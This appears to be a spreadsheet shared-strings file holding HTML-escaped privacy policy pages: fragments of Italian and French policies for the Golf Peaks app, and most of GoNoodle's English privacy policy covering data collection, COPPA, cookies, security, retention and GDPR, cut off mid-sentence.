&lt;p&gt;Potremmo aggiornare periodicamente la nostra Informativa sulla privacy. Ti informeremo di eventuali modifiche pubblicando la nuova Informativa sulla privacy in questa pagina.&lt;/p&gt;
&lt;p&gt;Vi informeremo via e-mail e / o un avviso di rilievo sul nostro Servizio, prima che la modifica diventi effettiva e aggiorneremo la &amp;quot;data di validità&amp;quot; nella parte superiore di questa Informativa sulla privacy.&lt;/p&gt;
&lt;p&gt;Si consiglia di rivedere periodicamente la presente Informativa sulla privacy per eventuali modifiche.</t>
  </si>
  <si>
    <t>Le modifiche a tale informativa sulla privacy entrano in vigore nel momento in cui vengono pubblicate su questa pagina.&lt;/p&gt;
&lt;h2&gt;Contattaci&lt;/h2&gt;
&lt;p&gt; In caso di domande sulla presente Informativa sulla privacy, si prega di contattarci:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Tramite e-mail: &lt;a href="/cdn-cgi/l/email-protection" class="__cf_email__" data-cfemail="6b0c04070d2b0a0d1f0e19091e1905450c0a060e18"&gt;[email&amp;#160;protected]&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/div&gt;
&lt;div class="tab-content translations-content-item fr hidden" id="fr"&gt;
&lt;h1&gt;Politique de Confidentialité&lt;/h1&gt;
&lt;p&gt;Date de prise d'effet: October 15, 2018&lt;/p&gt;
&lt;p&gt;Afterburn Łukasz Spierewka (&amp;quot;nous&amp;quot;, &amp;quot;notre&amp;quot;, &amp;quot;nos&amp;quot;) exploite l'application mobile Golf Peaks (ci-après désignée par le terme &amp;quot;Service&amp;quot;).&lt;/p&gt;
&lt;p&gt;Cette page vous explique nos politiques en matière de collecte, d'utilisation et de communication des données à caractère personnel lorsque vous utilisez notre Service ainsi que les choix qui s'offrent à vous en ce qui concerne ces données. Cette politique de confidentialité est gérée par &lt;a href="https://www.freeprivacypolicy.com/free-privacy-policy-generator/" target="_blank"&gt;Privacy Policy Generator&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Nous utilisons vos données pour fournir</t>
  </si>
  <si>
    <t>&lt;!DOCTYPE html&gt;&lt;html lang="en"&gt;&lt;head&gt;&lt;meta charSet="utf-8"/&gt;&lt;meta name="viewport" content="width=device-width"/&gt;&lt;meta name="description" content="Get Your Kids Moving &amp;amp; Practicing Mindfulness with GoNoodle®. Start Watching Now &amp;amp; Get Access to Hundreds of Videos!</t>
  </si>
  <si>
    <t>Active Learning. Healthy Kids. Active Kids.</t>
  </si>
  <si>
    <t>Boost Learning. "/&gt;&lt;meta name="theme-color" content="#ffffff"/&gt;&lt;title&gt;GoNoodle&lt;/title&gt;&lt;meta name="next-head-count" content="5"/&gt;&lt;link rel="icon" type="image/png" sizes="32x32" href="./favicon-32x32.png"/&gt;&lt;link rel="icon" type="image/png" sizes="16x16" href="./favicon-16x16.png"/&gt;&lt;link rel="apple-touch-icon" sizes="180x180" href="./apple-touch-icon.png"/&gt;&lt;link rel="manifest" href="./site.webmanifest"/&gt;&lt;link rel="mask-icon" href="./safari-pinned-tab.svg" color="#5bbad5"/&gt;&lt;meta name="theme-color" content="#ffffff"/&gt;&lt;link rel="preload" href="/company/_next/static/media/1060bab20f18b5c2-s.p.woff2" as="font" type="font/woff2" crossorigin="anonymous" data-next-font="size-adjust"/&gt;&lt;link rel="preload" href="/company/_next/static/media/2e99f7853f79f16a-s.p.woff2" as="font" type="font/woff2" crossorigin="anonymous" data-next-font="size-adjust"/&gt;&lt;link rel="preload" href="/company/_next/static/media/f5606e1873815f80-s.p.woff2" as="font" type="font/woff2" crossorigin="anonymous" data-next-font="size-adjust"/&gt;&lt;link rel="preload" href="/company/_next/static/css/f39a0c431bfb949f.css" as="style"/&gt;&lt;link rel="stylesheet" href="/company/_next/static/css/f39a0c431bfb949f.css" data-n-g=""/&gt;&lt;noscript data-n-css=""&gt;&lt;/noscript&gt;&lt;script defer="" nomodule="" src="/company/_next/static/chunks/polyfills-c67a75d1b6f99dc8.js"&gt;&lt;/script&gt;&lt;script src="/company/_next/static/chunks/webpack-b9927042561fa663.js" defer=""&gt;&lt;/script&gt;&lt;script src="/company/_next/static/chunks/framework-19f3649580393c10.js" defer=""&gt;&lt;/script&gt;&lt;script src="/company/_next/static/chunks/main-82d861c34d8afd82.js" defer=""&gt;&lt;/script&gt;&lt;script src="/company/_next/static/chunks/pages/_app-f0bbc39d6d310c9f.js" defer=""&gt;&lt;/script&gt;&lt;script src="/company/_next/static/chunks/a29ae703-71711b64cf7ba2ad.js" defer=""&gt;&lt;/script&gt;&lt;script src="/company/_next/static/chunks/400-1335963b6a425f7a.js" defer=""&gt;&lt;/script&gt;&lt;script src="/company/_next/static/chunks/184-0eacef38a120869f.js" defer=""&gt;&lt;/script&gt;&lt;script src="/company/_next/static/chunks/pages/p/%5Bslug%5D-99e62c5b52a1d08d.js" defer=""&gt;&lt;/script&gt;&lt;script src="/company/_next/static/7x0LMfh4l0BeAzEXlpzOP/_buildManifest.js" defer=""&gt;&lt;/script&gt;&lt;script src="/company/_next/static/7x0LMfh4l0BeAzEXlpzOP/_ssgManifest.js" defer=""&gt;&lt;/script&gt;&lt;/head&gt;&lt;body&gt;&lt;div id="__next"&gt;&lt;div&gt;&lt;nav class="bg-black gn-nav" aria-label="Primary Navigation"&gt;&lt;div class="flex items-center h-navbar p-sm container"&gt;&lt;div</t>
  </si>
  <si>
    <t>class="lg:hidden flex justify-between items-center"&gt;&lt;div role="navigation" data-headlessui-state=""&gt;&lt;button class="items-center justify-center mr-sm p-xs rounded-md text-white hover:text-white hover:bg-gray-700 focus:outline-none focus:ring-2 focus:ring-inset focus:ring-mint" id="headlessui-menu-button-:R2l6:" type="button" aria-haspopup="menu" aria-expanded="false" data-headlessui-state=""&gt;&lt;span class="sr-only"&gt;Open main menu&lt;/span&gt;&lt;svg xmlns="http://www.w3.org/2000/svg" fill="none" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" aria-hidden="true" class="block h-6 w-6"&gt;&lt;path stroke-linecap="round" stroke-linejoin="round" d="M4 6h16M4 12h16M4 18h16"&gt;&lt;/path&gt;&lt;/svg&gt;&lt;/button&gt;&lt;/div&gt;&lt;a href="/company"&gt;&lt;svg class="transform transition hover:scale-110" width="51" height="38" viewBox="0 0 51 38" fill="none" xmlns="http://www.w3.org/2000/svg"&gt;&lt;path fill-rule="evenodd" clip-rule="evenodd" d="M47.9584 28.6096L50.1257 32.3308C50.3206 32.6609 50.242 33.0837 49.9307 33.3172C46.0078 36.2594 41.0827 38.0061 35.7306 37.9999C31.5283 37.9954 27.5911 36.9129 24.1994 35.0192C23.8255 34.8101 23.7029 34.3443 23.9144 33.9803L26.0589 30.3031C26.2778 29.9272 26.7726 29.791 27.159 30.0075C29.682 31.4207 32.6114 32.233 35.7409 32.237C39.9215 32.2415 43.7516 30.8 46.7283 28.3993C47.1188 28.0844 47.7065 28.1834 47.9584 28.6096Z" fill="white"&gt;&lt;/path&gt;&lt;path fill-rule="evenodd" clip-rule="evenodd" d="M16.309 0.70096C16.3055 0.298641 15.959 -0.0175083 15.5463 0.000753035C14.3766 0.0532543 13.1962 0.201627 12.0145 0.453291C7.65001 1.38291 3.90279 3.57826 1.07956 6.5674C0.709626 6.95888 0.730717 7.52898 1.12744 7.87138L3.92617 10.6808C4.34626 11.0437 5.02855 10.9981 5.43383 10.5929C7.50238 8.52764 10.1962 7.00739 13.3073 6.34484C14.0928 6.17764 14.8777 6.07093 15.6557 6.02128C16.0262 5.99788 16.3124 5.696 16.309 5.3342V0.70096Z" fill="white"&gt;&lt;/path&gt;&lt;path fill-rule="evenodd" clip-rule="evenodd" d="M12.3991 11.09C19.241 11.09 24.7897 16.4641 24.7897 23.0911C24.7897 29.718 19.241 35.1001 12.3991 35.1001C5.54816 35.1001 0 29.718 0 23.0911C0 16.4641 5.54816 11.09 12.3991 11.09ZM13.3918 28.059C16.24 28.059 18.5482 25.8229 18.5482 23.0646C18.5482 20.3064 16.24 18.0702 13.3918 18.0702C10.5443 18.0702 8.23543 20.3064 8.23543 23.0646C8.23543 25.8229 10.5443 28.059 13.3918 28.059Z" fill="white"&gt;&lt;/path&gt;&lt;path fill-rule="evenodd" clip-rule="evenodd" d="M35.5584 0.978394C43.3011 0.978394 49.5797 7.04857 49.5797 14.5348C49.5797 22.021 43.3011 28.1003 35.5584 28.1003C27.8064 28.1003 21.5279 22.021 21.5279 14.5348C21.5279 7.04857 27.8064 0.978394 35.5584 0.978394ZM34.6059 20.4398C37.7798 20.4398 40.3529 17.9518 40.3529 14.8831C40.3529 11.8145 37.7798 9.32646 34.6054 9.32646C31.4315 9.32646 28.8584 11.8145 28.8584 14.8831C28.8584 17.9518 31.4315 20.4398 34.6059 20.4398Z" fill="white"&gt;&lt;/path&gt;&lt;/svg&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="hidden lg:block absolute"&gt;&lt;a href="/company"&gt;&lt;img style="width:150px" class="transform transition hover:scale-110" src="https://cdn.gonoodle.com/Universe-Component-Library/general/GoNoodleLogo_Registered_Reverse.svg" alt="GoNoodle logo"/&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="hidden lg:flex mx-auto"&gt;&lt;div role="navigation" data-headlessui-state=""&gt;&lt;button class="text-white rounded border-2 border-black px-sm py-xs hover:border-mint focus:outline-none" id="headlessui-menu-button-:Rit6:" type="button" aria-haspopup="menu" aria-expanded="false" data-headlessui-state=""&gt;&lt;span class="gn-text-sm font-bold"&gt;Topics&lt;/span&gt;&lt;/button&gt;&lt;/div&gt;&lt;div role="navigation" data-headlessui-state=""&gt;&lt;button class="text-white rounded border-2 border-black px-sm py-xs hover:border-mint focus:outline-none" id="headlessui-menu-button-:Rkt6:" type="button" aria-haspopup="menu" aria-expanded="false" data-headlessui-state=""&gt;&lt;span class="gn-text-sm font-bold"&gt;Channels&lt;/span&gt;&lt;/button&gt;&lt;/div&gt;&lt;div role="navigation" data-headlessui-state=""&gt;&lt;button class="text-white rounded border-2 border-black px-sm py-xs hover:border-mint focus:outline-none" id="headlessui-menu-button-:Rmt6:" type="button" aria-haspopup="menu" aria-expanded="false" data-headlessui-state=""&gt;&lt;span class="gn-text-sm font-bold"&gt;Activities &amp;amp; Routines&lt;/span&gt;&lt;/button&gt;&lt;/div&gt;&lt;div role="navigation" data-headlessui-state=""&gt;&lt;button class="text-white rounded border-2 border-black px-sm py-xs hover:border-mint focus:outline-none" id="headlessui-menu-button-:Rot6:" type="button" aria-haspopup="menu" aria-expanded="false" data-headlessui-state=""&gt;&lt;span class="gn-text-sm font-bold"&gt;Skills &amp;amp; Knowledge&lt;/span&gt;&lt;/button&gt;&lt;/div&gt;&lt;div class="self-center text-transparent bg-clip-text bg-gradient-to-r from-yellow to-pink gn-text-sm font-bold rounded border-2 border-black px-sm py-xs hover:border-mint focus:outline-none"&gt;&lt;a href="/company/post/what-is-new-with-gonoodle"&gt;New on GoNoodle&lt;/a&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;/nav&gt;&lt;main role="main"&gt;&lt;h1 class="sr-only"&gt; Page&lt;/h1&gt;&lt;div data-overlay-container="true"&gt;&lt;div class="container px-sm md:px-2xl my-xl"&gt;&lt;h1 class="gn-page-header-sm py-sm md:mr-2xl"&gt;GoNoodle</t>
  </si>
  <si>
    <t>Privacy Policy&lt;/h1&gt;&lt;p class="gn-text text-gray-500 py-sm"&gt;Last updated: &lt;!-- --&gt;January 17, 2023&lt;/p&gt;&lt;div&gt;&lt;p class="gn-text"&gt;&lt;strong&gt;&lt;em&gt;GoNoodle Privacy Policy&lt;/em&gt;&lt;/strong&gt;&lt;/p&gt;&lt;br/&gt;&lt;p class="gn-text"&gt;Last updated: January 17, 2023&lt;/p&gt;&lt;br/&gt;&lt;p class="gn-text"&gt;This privacy policy (“Privacy Policy”) is about how GoNoodle, Inc. (“GoNoodle,” “we,” “us,” or “our”) will collect and use any information given to us by users of GoNoodle.com (the “Site”), the GoNoodle mobile phone applications (the “Apps”) or other online services offered by GoNoodle (collectively, together with the Site and the Apps, the “Services”).&lt;/p&gt;&lt;br/&gt;&lt;p class="gn-text"&gt;&lt;br/&gt;If you are a child (under 13 years old) and need help understanding this Privacy Policy, you should ask a grown-up to read it and explain it to you.&lt;/p&gt;&lt;br/&gt;&lt;p class="gn-text"&gt;&lt;/p&gt;&lt;br/&gt;&lt;p class="gn-text"&gt;&lt;strong&gt;WHAT INFORMATION DOES GONOODLE COLLECT FROM UNREGISTERED USERS?&lt;/strong&gt;&lt;/p&gt;&lt;br/&gt;&lt;p class="gn-text"&gt;Users may access our Services without registering for an account, as described in our &lt;a class="font-bold text-purple-600" href="https://www.gonoodle.com/company/p/tos"&gt;Terms of Service&lt;/a&gt;. For all users, whether they are account holders, users of profiles created under a given account, or non-account holders, we may collect the following information:&lt;/p&gt;&lt;br/&gt;&lt;ul class="list-disc"&gt;&lt;li class="ml-lg"&gt;IP Address;&lt;/li&gt;&lt;li class="ml-lg"&gt;Device ID and other unique identifiers (including when the Services are accessed through Apple TV);&lt;/li&gt;&lt;li class="ml-lg"&gt;Software and operating system information;&lt;/li&gt;&lt;li class="ml-lg"&gt;URL of the site users came from;&lt;/li&gt;&lt;li class="ml-lg"&gt;Browser version;&lt;/li&gt;&lt;li class="ml-lg"&gt;Pages users visit and the details of user interactions with such pages;&lt;/li&gt;&lt;li class="ml-lg"&gt;Whether a user self-selects as an Educator or not;&lt;/li&gt;&lt;li class="ml-lg"&gt;Search terms within our Services; and&lt;/li&gt;&lt;li class="ml-lg"&gt;Other “clickstream” data.&lt;/li&gt;&lt;/ul&gt;&lt;p class="gn-text"&gt;&lt;br/&gt;We may collect this information ourselves or use a third party to collect and process the information on our behalf, including via the use of cookies, web beacons and other technologies (see “HOW DOES GONOODLE USE COOKIES?” section for more details).</t>
  </si>
  <si>
    <t>A list of third parties who collect, use, or store our user’s personal information can be found on our &lt;a class="font-bold text-purple-600" href="https://www.gonoodle.com/company/p/third-party-operators"&gt;Third Party List&lt;/a&gt;.&lt;/p&gt;&lt;br/&gt;&lt;p class="gn-text"&gt;&lt;/p&gt;&lt;br/&gt;&lt;p class="gn-text"&gt;&lt;strong&gt;WHAT INFORMATION DOES GONOODLE COLLECT FROM REGISTERED GROWN-UPS?&lt;/strong&gt;&lt;/p&gt;&lt;br/&gt;&lt;p class="gn-text"&gt;&lt;/p&gt;&lt;br/&gt;&lt;p class="gn-text"&gt;Parents, legal guardians, or other adults in the home (“Grown-Ups”) will need to register to create a Family Account. When a Grown-Up registers to create an account (a “Family Account”), we collect the following information from the Grown-Up:&lt;/p&gt;&lt;br/&gt;&lt;ul class="list-disc"&gt;&lt;li class="ml-lg"&gt;Birth year (collected only for age verification purposes and discarded when registration is complete);&lt;/li&gt;&lt;li class="ml-lg"&gt;Email address;&lt;/li&gt;&lt;li class="ml-lg"&gt;IP Address; and&lt;/li&gt;&lt;li class="ml-lg"&gt;Password.&lt;/li&gt;&lt;/ul&gt;&lt;p class="gn-text"&gt;&lt;br/&gt;&lt;strong&gt;WHAT INFORMATION DOES GONOODLE COLLECT FROM REGISTERED EDUCATORS?&lt;/strong&gt;&lt;/p&gt;&lt;br/&gt;&lt;p class="gn-text"&gt;When a teacher or educator (“Educator”) registers to create an account (an “Educator Account”), we collect the following information from the Educator:&lt;/p&gt;&lt;br/&gt;&lt;ul class="list-disc"&gt;&lt;li class="ml-lg"&gt;First name;&lt;/li&gt;&lt;li class="ml-lg"&gt;Last name;&lt;/li&gt;&lt;li class="ml-lg"&gt;Email address;&lt;/li&gt;&lt;li class="ml-lg"&gt;Zip Code;&lt;/li&gt;&lt;li class="ml-lg"&gt;Password; and&lt;/li&gt;&lt;li class="ml-lg"&gt;School Name.&lt;/li&gt;&lt;/ul&gt;&lt;p class="gn-text"&gt;Once the Educator Account is created, we collect the following information from the Educator:&lt;/p&gt;&lt;br/&gt;&lt;ul class="list-disc"&gt;&lt;li class="ml-lg"&gt;Class Name;&lt;/li&gt;&lt;li class="ml-lg"&gt;Grade Level; and&lt;/li&gt;&lt;li class="ml-lg"&gt;Number of Students in the class.&lt;/li&gt;&lt;/ul&gt;&lt;p class="gn-text"&gt;&lt;br/&gt;Note: Students do not create Educator Accounts and are not intended to. Accordingly, we do not knowingly collect Personal Data from or about students through Educator Accounts.</t>
  </si>
  <si>
    <t>Instead, the Educator Account is created, and the Services displayed, by the Educator to the class.&lt;/p&gt;&lt;br/&gt;&lt;p class="gn-text"&gt;&lt;/p&gt;&lt;br/&gt;&lt;p class="gn-text"&gt;&lt;strong&gt;WHAT INFORMATION IS GONOODLE CAREFUL NOT TO COLLECT?&lt;/strong&gt;&lt;/p&gt;&lt;br/&gt;&lt;p class="gn-text"&gt;Personal Data is information which is related to an identified or identifiable natural person, including information that directly or indirectly identifies a natural person (collectively, “Personal Data”). GoNoodle never collects Personal Data from children absent direct parental consent, as is required under the Children’s Online Privacy Protection Act (“COPPA”). We place account registration for all child-directed properties behind an age-gate, to prevent children from inadvertently registering.&lt;br/&gt;&lt;/p&gt;&lt;br/&gt;&lt;p class="gn-text"&gt;Beyond what is disclosed above, GoNoodle would only collect Personal Data from a child under the age of thirteen (13) after notifying the child’s Grown-Up and obtaining direct consent in advance.</t>
  </si>
  <si>
    <t>In the event that we learn that we have accidentally collected such Personal Data without the requisite and verifiable parental consent, we delete that information from our database as quickly as practical.&lt;/p&gt;&lt;br/&gt;&lt;p class="gn-text"&gt;Parents may review their child’s Personal Data or request that their child’s Personal Data be deleted, corrected, or no longer collected or used by contacting us at privacy@gonoodle.com.&lt;/p&gt;&lt;br/&gt;&lt;p class="gn-text"&gt;&lt;/p&gt;&lt;br/&gt;&lt;p class="gn-text"&gt;&lt;strong&gt;HOW DOES GONOODLE USE THE INFORMATION IT COLLECTS?&lt;/strong&gt;&lt;/p&gt;&lt;br/&gt;&lt;p class="gn-text"&gt;Depending on whether a user is an unregistered user, a Grown-Up registered for a Family Account, or an Educator registered for an Educator Account, GoNoodle may use the information it collects in different ways. However, regardless of whether or not a user is registered for an account and irrespective of the type of account for which the user is registered, by accessing and/or using the Services, users accept and agree to be bound by this Privacy Policy, our &lt;a class="font-bold text-purple-600" href="https://www.gonoodle.com/company/p/tos"&gt;Terms of Service&lt;/a&gt;, and the &lt;a class="font-bold text-purple-600" href="https://www.gonoodle.com/company/p/eula"&gt;End User License Agreement&lt;/a&gt;, which are incorporated by reference here.&lt;/p&gt;&lt;br/&gt;&lt;p class="gn-text"&gt;&lt;/p&gt;&lt;br/&gt;&lt;p class="gn-text"&gt;For Grown-Ups registering for Family Accounts, we use the Grown-Up’s email address to send account verification emails and to send updates about how the Services are being used. Once the Grown-Up clicks the link in the account verification email, the account is created and a zip or other postal code is assigned to the account based on the IP address.</t>
  </si>
  <si>
    <t>If a Grown-Up does not complete registration within seven (7) days of the verification email, GoNoodle deletes the Personal Data associated with the account set up from its records.&lt;/p&gt;&lt;br/&gt;&lt;p class="gn-text"&gt;&lt;/p&gt;&lt;br/&gt;&lt;p class="gn-text"&gt;Once registered for a Family Account, we may collect and retain contact information and other Personal Data from the Grown-Up in a number of ways, such as when the Grown-Up requests email updates or other information, completes customer surveys, or submits a feedback or contact form. We use the zip code to display content from local underwriters and sponsors. When a user contacts us by phone, email, or postal mail, we may also receive and process that user’s Personal Data.&lt;/p&gt;&lt;br/&gt;&lt;p class="gn-text"&gt;&lt;/p&gt;&lt;br/&gt;&lt;p class="gn-text"&gt;In addition to the Personal Data we collect, we create aggregated, de-identified data and use it to improve our Services, to demonstrate the efficacy of our Services, and to develop new services.</t>
  </si>
  <si>
    <t>We share aggregated, de-identified information with our sponsors to let them know how many users viewed and interacted with their materials but this information does not identify any individual. We do not sell Grown Ups’ Personal Data.&lt;/p&gt;&lt;br/&gt;&lt;p class="gn-text"&gt;&lt;/p&gt;&lt;br/&gt;&lt;p class="gn-text"&gt;We engage third-party service providers that help us administer and provide the Services (for example, a web hosting company whose services we use to host our application). In some cases, these third parties need access to Personal Data, and so we may share Personal Data to the extent necessary in order for them to be able to perform those services for us.</t>
  </si>
  <si>
    <t>We maintain and regularly update an active &lt;a class="font-bold text-purple-600" href="https://www.gonoodle.com/company/p/third-party-operators"&gt;Third Party List&lt;/a&gt; of service providers who have access to our users’ Personal Data.&lt;/p&gt;&lt;br/&gt;&lt;p class="gn-text"&gt;&lt;br/&gt;For Educator Account holders, we use the information we collect to create the account, associate the account with the correct school, and better understand the geographic distribution of our user base, as examples. We collect date of birth to verify eligibility for the Services, however we discard it once registration is complete.</t>
  </si>
  <si>
    <t>We may also provide aggregated, de-identified information about Educators’ use of GoNoodle to our sponsors or the Educators’ education institution administrator. GoNoodle does not share Educators’ names or sell Educators’ Personal Data.&lt;/p&gt;&lt;br/&gt;&lt;p class="gn-text"&gt;&lt;/p&gt;&lt;br/&gt;&lt;p class="gn-text"&gt;If we want to share Personal Data in a way that is materially different than we have described in this Privacy Policy, we will notify the user in advance and obtain consent in accordance with applicable law.&lt;br/&gt;&lt;/p&gt;&lt;br/&gt;&lt;p class="gn-text"&gt;&lt;strong&gt;HOW DOES GONOODLE USE COOKIES?&lt;/strong&gt;&lt;/p&gt;&lt;br/&gt;&lt;p class="gn-text"&gt;GoNoodle also uses “cookies” to enhance users’ Site visits. A “cookie” is information either temporarily or permanently stored in a file on users’ computer.</t>
  </si>
  <si>
    <t>Users can set their browser to reject cookies, but that may limit use of some GoNoodle features. For more information on cookies and how GoNoodle uses them, please see our &lt;a class="font-bold text-purple-600" href="https://www.gonoodle.com/company/p/cookie-policy"&gt;Cookie Notification&lt;/a&gt;.&lt;/p&gt;&lt;br/&gt;&lt;p class="gn-text"&gt;&lt;/p&gt;&lt;br/&gt;&lt;p class="gn-text"&gt;&lt;strong&gt;&lt;em&gt;DOES GONOODLE USE THIRD-PARTY TRACKING?&lt;/em&gt;&lt;/strong&gt;&lt;/p&gt;&lt;br/&gt;&lt;p class="gn-text"&gt;GoNoodle may, from time to time, serve targeted contextual advertising to its users on the Services. This is commonplace on the Internet.</t>
  </si>
  <si>
    <t>When anyone uses the Internet, unaffiliated parties such as ad networks, web analytics companies, and social networking platforms may collect information about users’ online activities over time and across our and other websites. This information may be used to provide advertisements for products and services that may interest GoNoodle users, and those companies may use cookies, clear GIFs, and other tracking technologies. Notwithstanding the foregoing, GoNoodle does not utilize third party trackers on portions of the Services commonly accessed by children.&lt;/p&gt;&lt;br/&gt;&lt;p class="gn-text"&gt;&lt;/p&gt;&lt;br/&gt;&lt;p class="gn-text"&gt;For more information about third-party advertisers and how to prevent them from using your information, visit the NAI’s consumer website at &lt;a class="font-bold text-purple-600" href="http://www.networkadvertising.org/choices"&gt;http://www.networkadvertising.org/choices&lt;/a&gt; or &lt;a class="font-bold text-purple-600" href="http://www.aboutads.info/choices/"&gt;http://www.aboutads.info/choices/&lt;/a&gt;.</t>
  </si>
  <si>
    <t>If you want to opt out using these tools, you need to opt out separately for each of your devices and for each web browser (such as Google Chrome, Firefox, or Safari) that you use on each device.&lt;br/&gt;&lt;/p&gt;&lt;br/&gt;&lt;p class="gn-text"&gt;&lt;strong&gt;&lt;em&gt;HOW GONOODLE COMMUNICATES WITH USERS&lt;/em&gt;&lt;/strong&gt;&lt;/p&gt;&lt;br/&gt;&lt;p class="gn-text"&gt;We do not send marketing messages to children. We do send emails to Grown-Ups or Educators with information about our Services that we believe may be of interest when these users have opted in to receive those messages. Users may opt out of receiving email messages by contacting us at support@gonoodle.com or by clicking on the “unsubscribe” link found at the bottom of every email that we send.&lt;/p&gt;&lt;br/&gt;&lt;p class="gn-text"&gt;&lt;/p&gt;&lt;br/&gt;&lt;p class="gn-text"&gt;Grown-Ups and Educators may also choose to subscribe to email newsletter communications from GoNoodle.</t>
  </si>
  <si>
    <t>These communications may include invitations to participate in GoNoodle promotions or surveys, as well as information about GoNoodle events, updates, and other activities, and users may provide us with additional information when they participate in these activities. In addition, users may provide us with additional information when they fill out the feedback or support contact forms. We use the information provided to respond to their concern.&lt;/p&gt;&lt;br/&gt;&lt;p class="gn-text"&gt;&lt;/p&gt;&lt;br/&gt;&lt;p class="gn-text"&gt;&lt;strong&gt;&lt;em&gt;ACCESSIBILITY STATEMENT&lt;/em&gt;&lt;/strong&gt;&lt;/p&gt;&lt;br/&gt;&lt;p class="gn-text"&gt;GoNoodle is committed to making the Site, Apps and Services accessible to everyone.</t>
  </si>
  <si>
    <t>We continue our mission to follow Web Content Accessibility Guidelines (WCAG) and use Accessible Rich Internet Applications (ARIA) specification to help support people with disabilities.&lt;/p&gt;&lt;br/&gt;&lt;p class="gn-text"&gt;&lt;/p&gt;&lt;br/&gt;&lt;p class="gn-text"&gt;If you do encounter any difficulty using GoNoodle, please reach out to us via support@gonoodle.com with details about the section or webpage, and we will make all reasonable efforts to make that page accessible.&lt;/p&gt;&lt;br/&gt;&lt;p class="gn-text"&gt;&lt;/p&gt;&lt;br/&gt;&lt;p class="gn-text"&gt;&lt;strong&gt;&lt;em&gt;SECURITY&lt;/em&gt;&lt;/strong&gt;&lt;/p&gt;&lt;br/&gt;&lt;p class="gn-text"&gt;We are committed to protecting the security, integrity, and confidentiality of all user data through the use of commercially-reasonable physical, technical and administrative safeguards. GoNoodle stores data in secure cloud-based environments and uses server authentication and industry-standard firewalls in an effort to prevent interference or access from outside intruders. We also require unique account identifiers, user names, and passwords that must be entered each time users access the Services.&lt;/p&gt;&lt;br/&gt;&lt;p class="gn-text"&gt;&lt;/p&gt;&lt;br/&gt;&lt;p class="gn-text"&gt;Nonetheless, despite GoNoodle’s security efforts described above, it is common knowledge that transmission of information via the Internet is not wholly secure, and we cannot guarantee the security of Personal Data transmitted to or through any of our Services.</t>
  </si>
  <si>
    <t>Any transmission of Personal Data by you is at your own risk. By using our Services, you acknowledge and accept these risks. As a result, we cannot guarantee or warrant the security of any information you disclose or transmit to us or that are otherwise provided to us and we cannot be responsible for the theft, destruction, or inadvertent disclosure of information.</t>
  </si>
  <si>
    <t>It is your responsibility to safeguard any passwords, ID numbers, or other special access features associated with your use of the Services. Any transmission of information is at your own risk. By using our Services, you acknowledge and accept these risks.&lt;/p&gt;&lt;br/&gt;&lt;p class="gn-text"&gt;&lt;/p&gt;&lt;br/&gt;&lt;p class="gn-text"&gt;You are responsible for maintaining the confidentiality of your user name and password, as well as the credentials of any other users operating under your account.</t>
  </si>
  <si>
    <t>If you become aware of, or suspect, any unauthorized use of an account or loss of your or your users’ account credentials or suspect any other security incident related to GoNoodle, notify us immediately at privacy@gonoodle.com.&lt;/p&gt;&lt;br/&gt;&lt;p class="gn-text"&gt;&lt;/p&gt;&lt;br/&gt;&lt;p class="gn-text"&gt;&lt;strong&gt;&lt;em&gt;DATA RETENTION AND PRIVACY REQUESTS&lt;/em&gt;&lt;/strong&gt;&lt;/p&gt;&lt;br/&gt;&lt;p class="gn-text"&gt;We retain data for as long as an account is active, and for a period of time afterward to retain account continuity for Educators and Grown-Ups. Within twenty-four (24) months of inactivity on any account, we will delete the account and the associated Personal Data.&lt;/p&gt;&lt;br/&gt;&lt;p class="gn-text"&gt;&lt;/p&gt;&lt;br/&gt;&lt;p class="gn-text"&gt;If you would like to access, review, update, rectify, and delete any Personal Information we hold about you, or exercise any other data subject right available to you under the EU General Data Protection Regulation (GDPR), CCPA, CPRA, or other applicable law, send your request to privacy@gonoodle.com.&lt;/p&gt;&lt;br/&gt;&lt;p class="gn-text"&gt;&lt;/p&gt;&lt;br/&gt;&lt;p class="gn-text"&gt;Our privacy team will examine your request and respond to you as quickly as possible. We will honor valid deletion requests for deleting the account and the associated Personal Data within thirty (30) days.</t>
  </si>
  <si>
    <t>When you delete your account, it cannot be recovered. Please note that we do retain aggregated, de-identified data for the purposes described in this Privacy Policy.&lt;/p&gt;&lt;br/&gt;&lt;p class="gn-text"&gt;&lt;/p&gt;&lt;br/&gt;&lt;p class="gn-text"&gt;&lt;strong&gt;&lt;em&gt;GDPR: DATA COLLECTION IN THE EEA&lt;/em&gt;&lt;/strong&gt;&lt;/p&gt;&lt;br/&gt;&lt;p class="gn-text"&gt;Under the General Data Protection Regulation (EU) 2016/679 (known as, “GDPR”), GoNoodle functions as a “data controller” when we process certain Personal Data from Grown-Ups who access GoNoodle through a Family Account and for Educators who create an Educator Account in order to maintain and provide the Services, and for any marketing communications that Educators and Grown-Ups may opt in to receive.&lt;/p&gt;&lt;br/&gt;&lt;p class="gn-text"&gt;In these situations, the data processing and protection practices are explained in this Privacy Policy, the &lt;a class="font-bold text-purple-600" href="https://www.gonoodle.com/company/p/tos"&gt;Terms of Service&lt;/a&gt;, as well as with, where applicable, a contractual agreement with the educational institution with which the Educator users are affiliated.&lt;/p&gt;&lt;br/&gt;&lt;p class="gn-text"&gt;If you are a user accessing our Services from within the EEA (such user herein referred to as a “Data Subject”), we may ask for your consent so that we may process your Personal Data.</t>
  </si>
  <si>
    <t>For example, we will ask for your consent to send you marketing information. However, in certain situations, applicable data protection law allows us to process your Personal Data without needing to obtain your consent.  For example:&lt;/p&gt;&lt;br/&gt;&lt;ul class="list-disc"&gt;&lt;li class="ml-lg"&gt;To perform our contractual obligations to you, including fulfilling requests you have made, contacting you in relation to any issues with your use of the Services, or where we need to provide your Personal Data to our service providers who help us operate the Services.&lt;/li&gt;&lt;li class="ml-lg"&gt;To comply with laws, regulators, court orders, or other legal obligations.&lt;/li&gt;&lt;li class="ml-lg"&gt;To fulfill our “legitimate interests,” including to communicate with you regarding the Services including about changes to the Services, to respond to your questions about your use of the Services, to support our investigation of suspected illegal activity, to protect and defend our rights and property, or the rights or safety of others, to develop, provide, and improve our Services and to enforce our Terms of Service, End User License Agreement, and this Privacy Policy.&lt;/li&gt;&lt;/ul&gt;&lt;p class="gn-text"&gt;We also use automated data collection tools to correlate your IP address with your 